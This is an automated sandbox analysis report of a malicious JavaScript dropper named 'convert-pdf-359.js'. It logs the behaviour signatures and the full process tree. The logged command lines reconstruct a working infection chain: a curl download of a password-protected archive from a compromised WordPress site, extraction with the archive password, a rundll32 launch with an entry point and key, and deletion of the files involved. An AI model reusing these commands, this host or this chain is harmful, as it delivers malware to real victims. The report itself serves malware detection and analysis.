Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 14, 2023, 1:36 p.m.	Sept. 14, 2023, 1:38 p.m.

Size	43.7KB
Type	ASCII text
MD5	`5e554b41294605c0d114677cb3aec892`
SHA256	`5709a20da24e5d19defff1b35335a09d209163a9609d85fb944fa3c6025ac156`
CRC32	`0B9BFFD4`
ssdeep	`768:yP+RrZ8imUmDvHwL5NdEblS9z1BrnUdDeNAU4eF2GRrszw/FJXlDdH:yP+RreDvHqnUdKNAW`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js
2544
- cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js"
  2640
- cmd.exe "C:\Windows\System32\cmd.exe" /c echo curl https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
  2696
- cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
  2768
  - curl.exe curl https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location
    2860
- curl.exe "C:\util\curl\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\enim.q"
  2944
- cmd.exe "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\enim.q" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laudantium.a" > "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m""
  2576
  - enim.q "C:\Users\test22\AppData\Local\Temp\enim.q" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laudantium.a"
    2700
- cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\enim.q"
  2372
- cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a"
  2772
- cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m" "illo.g"
  1304
- rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\illo.g", scab /k arbalet875
  1892
  - rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\illo.g", scab /k arbalet875
    1736
- cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
  3048

Name	Response	Post-Analysis Lookup
restohalto.site
www.gentotarim.com	CNAME gentotarim.com A 89.163.140.12	89.163.140.12
www.7-zip.org	A 49.12.202.237	49.12.202.237

IP Address	Status	Action
164.124.101.2	Active	Moloch
49.12.202.237	Active	Moloch
89.163.140.12	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.3 192.168.56.101:49169 89.163.140.12:443	None	None	None
TLS 1.3 192.168.56.101:49173 49.12.202.237:443	None	None	None

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 14, 2023, 1:37 p.m.			0	0

Command line console output was observed (3 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 14, 2023, 1:36 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 14, 2023, 1:36 p.m.	buffer: curl console_handle: 0x00000007	1	1
WriteConsoleW Sept. 14, 2023, 1:36 p.m.	buffer: https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 14, 2023, 1:37 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Starts servers listening (6 events)

Time & API	Arguments	Status	Return
bind Sept. 14, 2023, 1:36 p.m.	ip_address: 127.0.0.1 socket: 144 port: 0	1	0
listen Sept. 14, 2023, 1:36 p.m.	socket: 144 backlog: 1	1	0
accept Sept. 14, 2023, 1:36 p.m.	ip_address: socket: 144 port: 0	1	152
bind Sept. 14, 2023, 1:36 p.m.	ip_address: 127.0.0.1 socket: 144 port: 0	1	0
listen Sept. 14, 2023, 1:36 p.m.	socket: 144 backlog: 1	1	0
accept Sept. 14, 2023, 1:36 p.m.	ip_address: socket: 144 port: 0	1	152

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 14, 2023, 1:37 p.m.	process_identifier: 1736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1	0	0

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\illo.g.bat

Creates a suspicious process (16 events)

cmdline	cmd.exe /c echo curl https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
cmdline	cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m" "illo.g"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a"
cmdline	"C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m" "illo.g"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a"
cmdline	cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\enim.q" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laudantium.a" > "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m""
cmdline	cmd.exe /c "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\enim.q"
cmdline	"C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\enim.q" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laudantium.a" > "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m""
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\enim.q"
cmdline	"C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
cmdline	"C:\Windows\System32\cmd.exe" /c echo curl https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat"

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\enim.q

A process created a hidden window (10 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Sept. 14, 2023, 1:36 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 1:36 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c echo curl https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\illo.g.bat" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 1:36 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c "C:\Users\test22\AppData\Local\Temp\illo.g.bat" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 1:36 p.m.	show_type: 0 filepath_r: curl parameters: https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\enim.q" filepath: curl	1	1
ShellExecuteExW Sept. 14, 2023, 1:37 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c ""C:\Users\test22\AppData\Local\Temp\enim.q" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laudantium.a" > "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m"" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 1:37 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c del "C:\Users\test22\AppData\Local\Temp\enim.q" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 1:37 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 1:37 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c ren "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m" "illo.g" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 1:37 p.m.	show_type: 0 filepath_r: rundll32 parameters: "C:\Users\test22\AppData\Local\Temp\illo.g", scab /k arbalet875 filepath: rundll32	1	1
ShellExecuteExW Sept. 14, 2023, 1:37 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat" filepath: cmd.exe	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Sept. 14, 2023, 1:37 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Sept. 14, 2023, 1:37 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Sept. 14, 2023, 1:37 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1

Uses Windows utilities for basic Windows functionality (8 events)

cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\enim.q"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\enim.q"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat"

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\laudantium.a

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\enim.q

One or more non-whitelisted processes were created (20 events)

parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\illo.g", scab /k arbalet875
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c echo curl https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
parent_process	wscript.exe	martian_process	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\enim.q"
parent_process	wscript.exe	martian_process	curl https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\enim.q"
parent_process	wscript.exe	martian_process	cmd.exe /c echo curl https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
parent_process	wscript.exe	martian_process	cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m" "illo.g"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\enim.q" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laudantium.a" > "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m""
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\enim.q"
parent_process	wscript.exe	martian_process	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m" "illo.g"
parent_process	wscript.exe	martian_process	cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\enim.q" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laudantium.a" > "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m""
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
parent_process	wscript.exe	martian_process	cmd.exe /c "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
parent_process	wscript.exe	martian_process	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
parent_process	wscript.exe	martian_process	"C:\util\curl\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\enim.q"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js"
parent_process	wscript.exe	martian_process	rundll32 "C:\Users\test22\AppData\Local\Temp\illo.g", scab /k arbalet875
parent_process	wscript.exe	martian_process	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js"

The process wscript.exe wrote an executable file to disk which it then attempted to execute (3 events)

file	C:\Windows\System32\cmd.exe
file	C:\util\curl\curl.exe
file	C:\Windows\System32\rundll32.exe

convert-pdf-359.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All